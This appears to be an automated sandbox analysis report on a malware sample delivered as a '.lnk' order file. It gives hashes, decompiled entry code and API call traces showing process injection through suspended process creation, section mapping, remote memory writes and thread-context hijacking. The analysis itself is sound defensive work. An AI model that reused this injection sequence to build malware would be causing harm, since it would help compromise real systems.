  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E3C8B, Relevance: 4.6, APIs: 3, Instructions: 53 Total matches: 12
Similarity
  • Total matches: 12
  • API ID: GetModuleFileName$GetLastError
  • String ID:
  • API String ID: 3709004705-0
  • Opcode ID: d4f5095c8902255d58a9495724da3ecc245ace53255d050a18a8176b02be640e
  • Instruction ID: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
  • Opcode Fuzzy Hash: 22D02B840B9C0AC30C4360859068B1563D10F11185B8879835744B07BF3F1130DFE75D
  • Instruction Fuzzy Hash: 1c819d795f5758a75cc16c79d532b1e89c3ae16fe89f2260c6209db603419fff
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
  • GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
  • GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Function 002E4B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E29FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: d8dea5f47279ff853c8e6c0729a614c8beac44f71225f0b0d2aaa62a2a57016e
  • Instruction ID: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
  • Opcode Fuzzy Hash: DAD0A7451C88F0D668246492EC8C7740B427C773CEC1D1000009864A01CBD9FFB37D5C
  • Instruction Fuzzy Hash: 55344035e386b307fdbdb0087fb3924a77938adfeec028a63dbf343d589967b5
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,002E7494,002E1728,?,002E7494), ref: 002E2A0A
  • GetVersion.KERNEL32(?,002E7494), ref: 002E2A19
  • GetCurrentProcessId.KERNEL32(?,002E7494), ref: 002E2A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,002E7494), ref: 002E2A49
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 3f2b9fcc2af1264bbed65c952509bd9e2800f2d6ba6530589bf9dcfa6290030a
  • Instruction ID: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
  • Opcode Fuzzy Hash: 03F0AC60AB2683C5CCF35840E54579D87C06B21A79C8C4B315508F45A77F28325F4F6C
  • Instruction Fuzzy Hash: 90736e0f68e5538e275b6e56e125247b4719fc3da7e88937ca4107ae998a2e85
APIs
  • memset.NTDLL ref: 002E2CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 002E2CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 002E2D14
  • lstrcpyW.KERNEL32(00000000,002E8224), ref: 002E2D29
  • lstrlen.KERNEL32(002E7494,?,?,?,?,?,?,?,?,?,?,002E18D7,?), ref: 002E2D46
  • lstrcpyW.KERNEL32(00000000,002E84B8), ref: 002E2D77
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • wsprintfW.USER32 ref: 002E2DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 002E2DE3
  • CoUninitialize.OLE32 ref: 002E2DF7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
  • WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
  • SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
  • GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
  • CloseHandle.KERNEL32(00000000), ref: 002E4B65
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1395, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71 Total matches: 162processmemory
Similarity
  • Total matches: 162
  • API ID: CreateProcessGetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 1501718689-2746444292
  • Opcode ID: ec666d8859198cc6dc2f36418ca03840fabeabaa94e38ef7fe01e5326dfd4177
  • Instruction ID: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
  • Opcode Fuzzy Hash: 73E0D8861F0CD5D2C8946488F1A3F51E7202F9045ACCEA72106A9281676E24F45F8BA9
  • Instruction Fuzzy Hash: 110f424a9e0f0e5d3f86d35bf262195d206ca1f37b0b6fadae47027560f24ba8
APIs
  • memset.NTDLL ref: 002E13B5
    • Part of subcall function 002E3340: GetProcAddress.KERNEL32(002E866B,002E45D9,00000000,002E618C,00000000,00000000,?,?,?,002E11A6,?,002E618C,00000000,00000000), ref: 002E3354
  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,04000004,00000000,00000000,00000044,?), ref: 002E13EE
  • GetLastError.KERNEL32(00000001), ref: 002E1422
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E1433
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
  • Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
  • Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
  • Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
APIs
  • memset.NTDLL ref: 002E3750
  • memcpy.NTDLL ref: 002E3778
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
  • GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: upsc.exe Analysis ID: 63295

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:5F53229E5AC3246C28629EE07946ADB6
Total matches:32
Initial Analysis Report:Open
Initial sample Analysis ID:63295
Initial sample SHA 256:B807ABCB46C6CC7566A1612B5BCC7CF2B4E4B627AFDC4078611354B165B02126
Initial sample name:SXU-591.1298.Q4-processing.order.lnk

Similar Executed Functions

Function 002E432F, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 209 Total matches: 33filememorytime
Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1CB2, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195 Total matches: 38native
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
  • Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
  • Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
  • Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
APIs
  • memset.NTDLL ref: 002E38A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995
    • Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
    • Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
    • Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
  • memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
    • Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
    • Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
  • Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
  • Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
  • Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
APIs
  • NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
  • SetLastError.KERNEL32(00000000), ref: 002E3EA7
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
  • Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
  • Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
  • Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
APIs
  • NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
  • SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B
Memory Dump Source
